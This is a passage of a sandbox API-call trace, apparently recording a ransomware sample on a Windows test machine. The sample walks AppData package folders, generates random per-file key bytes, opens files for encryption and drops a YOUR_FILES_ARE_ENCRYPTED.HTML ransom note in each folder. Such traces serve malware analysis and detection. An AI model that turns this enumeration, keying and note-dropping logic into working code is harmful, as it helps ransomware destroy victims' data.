ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0121.814] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.814] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\roaming.lock") returned 104 [0121.814] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0121.814] lstrlenW (lpString=".lock") returned 5 [0121.814] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0121.814] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x952291bd, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x952291bd, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0121.814] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.814] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\settings.dat") returned 104 [0121.814] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0121.814] lstrlenW (lpString=".dat") returned 4 [0121.814] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0121.814] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0121.814] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0121.814] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0121.815] GetProcessHeap () returned 0x600000 [0121.815] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0121.817] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="4A") returned 2 [0121.817] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="00") returned 2 [0121.817] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="18") returned 2 [0121.817] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="B6") returned 2 [0121.817] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="EE") returned 2 [0121.817] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="0B") returned 2 [0121.817] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="C9") returned 2 [0121.817] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="57") returned 2 [0121.817] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="37") returned 2 [0121.817] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="43") returned 2 [0121.817] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="78") returned 2 [0121.817] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="E2") returned 2 [0121.817] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="4B") returned 2 [0121.817] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="AF") returned 2 [0121.817] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="1E") returned 2 [0121.817] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="AC") returned 2 [0121.817] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="89") returned 2 [0121.817] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="D2") returned 2 [0121.817] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="22") returned 2 [0121.817] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="73") returned 2 [0121.817] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="93") returned 2 [0121.817] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="92") returned 2 [0121.817] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="17") returned 2 [0121.817] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="43") returned 2 [0121.817] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="A7") returned 2 [0121.817] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="E7") returned 2 [0121.817] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="5D") returned 2 [0121.817] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="71") returned 2 [0121.817] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="42") returned 2 [0121.817] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="F4") returned 2 [0121.817] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="21") returned 2 [0121.817] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="12") returned 2 [0121.818] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\settings.dat" [0121.818] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0121.818] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0121.818] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x950391b1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x950391b1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x950391b1, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0121.818] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.818] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\settings.dat.LOG1") returned 109 [0121.818] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0121.818] lstrlenW (lpString=".LOG1") returned 5 [0121.818] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0121.818] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x950391b1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x950391b1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x950391b1, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0121.818] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.818] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\settings.dat.LOG2") returned 109 [0121.818] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0121.818] lstrlenW (lpString=".LOG2") returned 5 [0121.818] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0121.818] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x950391b1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x950391b1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x950391b1, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0121.818] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.818] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0121.818] GetProcessHeap () returned 0x600000 [0121.818] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.819] WriteFile (in: hFile=0x338, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.820] CloseHandle (hObject=0x338) returned 1 [0121.820] GetProcessHeap () returned 0x600000 [0121.820] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.820] GetProcessHeap () returned 0x600000 [0121.820] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.820] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0121.820] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.820] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData") returned 96 [0121.820] GetProcessHeap () returned 0x600000 [0121.820] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.820] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData" [0121.820] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData\\*" [0121.820] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.820] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName="..", cAlternateFileName="")) returned 1 [0121.820] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName="..", cAlternateFileName="")) returned 0 [0121.820] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.821] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0121.821] GetProcessHeap () returned 0x600000 [0121.821] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.821] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.821] WriteFile (in: hFile=0x338, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.822] CloseHandle (hObject=0x338) returned 1 [0121.822] GetProcessHeap () returned 0x600000 [0121.822] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.822] GetProcessHeap () returned 0x600000 [0121.822] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.822] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0121.822] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.822] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState") returned 92 [0121.822] GetProcessHeap () returned 0x600000 [0121.822] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0121.822] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState" [0121.822] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState\\*" [0121.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0121.822] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName="..", cAlternateFileName="")) returned 1 [0121.822] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x31883fe, dwReserved1=0x3188358, cFileName="..", cAlternateFileName="")) returned 0 [0121.823] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.823] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0121.823] GetProcessHeap () returned 0x600000 [0121.823] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.823] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.823] WriteFile (in: hFile=0x338, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.824] CloseHandle (hObject=0x338) returned 1 [0121.824] GetProcessHeap () returned 0x600000 [0121.824] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.825] GetProcessHeap () returned 0x600000 [0121.825] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.825] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa05b11cd, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xa05b11cd, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa05b11cd, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0121.825] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0121.825] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 112 [0121.825] GetProcessHeap () returned 0x600000 [0121.825] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PrintDialog_cw5n1h2txyewy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows.printdialog_cw5n1h2txyewy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0121.825] WriteFile (in: hFile=0x214, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0121.826] CloseHandle (hObject=0x214) returned 1 [0121.826] GetProcessHeap () returned 0x600000 [0121.826] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.826] GetProcessHeap () returned 0x600000 [0121.826] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0121.827] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3706b2, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab58681a, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xab58681a, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Windows.PurchaseDialog_cw5n1h2txyewy", cAlternateFileName="WINDOW~1.PUR")) returned 1 [0121.828] StrStrIW (lpFirst="Windows.PurchaseDialog_cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.828] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy") returned 85 [0121.828] GetProcessHeap () returned 0x600000 [0121.828] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f4fc8 [0121.828] lstrcpyW (in: lpString1=0x30f4fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy" [0121.828] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\*" [0121.828] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Windows.PurchaseDialog_cw5n1h2txyewy\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xab3706b2, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xab58681a, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xabc1516c, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0121.832] FindNextFileW (in: 